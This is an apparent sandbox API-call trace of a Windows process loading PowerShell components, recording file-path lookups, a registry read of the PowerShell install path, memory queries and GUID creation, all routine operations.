	[0283.752] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20cca0 | out: lpFileInformation=0x20cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0283.752] SetErrorMode (uMode=0x1) returned 0x1
	[0283.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.752] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cd88 | out: phkResult=0x20cd88*=0x1c4) returned 0x0
	[0283.752] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20cd0c, lpData=0x0, lpcbData=0x20cd08*=0x0 | out: lpType=0x20cd0c*=0x1, lpData=0x0, lpcbData=0x20cd08*=0x56) returned 0x0
	[0283.752] CoTaskMemAlloc (cb=0x5a) returned 0x4b1970
	[0283.752] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20ccdc, lpData=0x4b1970, lpcbData=0x20ccd8*=0x56 | out: lpType=0x20ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20ccd8*=0x56) returned 0x0
	[0283.752] CoTaskMemFree (pv=0x4b1970) 
	[0283.752] RegCloseKey (hKey=0x1c4) returned 0x0
	[0283.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.757] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xee70732e, Data2=0x4a04, Data3=0x42c5, Data4=([0]=0xa9, [1]=0xe4, [2]=0xc1, [3]=0x77, [4]=0xb7, [5]=0x18, [6]=0x56, [7]=0x70))) returned 0x0
	[0283.757] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xe8a3a67, Data2=0x145b, Data3=0x4aaf, Data4=([0]=0x8f, [1]=0xda, [2]=0x53, [3]=0x26, [4]=0xf5, [5]=0xd8, [6]=0xd7, [7]=0x5f))) returned 0x0
	[0283.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.642] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xfbd624a8, Data2=0x33b2, Data3=0x4e23, Data4=([0]=0xbc, [1]=0xe1, [2]=0x45, [3]=0xc9, [4]=0xd3, [5]=0x2e, [6]=0x80, [7]=0x2d))) returned 0x0
	[0284.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.645] VirtualQuery (in: lpAddress=0x20afc0, lpBuffer=0x20be80, dwLength=0x30 | out: lpBuffer=0x20be80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.646] VirtualQuery (in: lpAddress=0x20b050, lpBuffer=0x20bf10, dwLength=0x30 | out: lpBuffer=0x20bf10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.648] VirtualQuery (in: lpAddress=0x20b7d0, lpBuffer=0x20c690, dwLength=0x30 | out: lpBuffer=0x20c690*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.650] VirtualQuery (in: lpAddress=0x20b7d0, lpBuffer=0x20c690, dwLength=0x30 | out: lpBuffer=0x20c690*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.651] VirtualQuery (in: lpAddress=0x20b7d0, lpBuffer=0x20c690, dwLength=0x30 | out: lpBuffer=0x20c690*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.652] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.652] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.652] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.652] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.653] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.653] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.653] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.653] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.653] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.653] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.653] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.653] VirtualQuery (in: lpAddress=0x20b400, lpBuffer=0x20c2c0, dwLength=0x30 | out: lpBuffer=0x20c2c0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.653] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.654] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.654] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.654] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.654] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x388ebb3e, Data2=0x5105, Data3=0x440a, Data4=([0]=0x97, [1]=0x47, [2]=0x73, [3]=0xc1, [4]=0x91, [5]=0xfe, [6]=0x34, [7]=0xba))) returned 0x0
	[0284.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
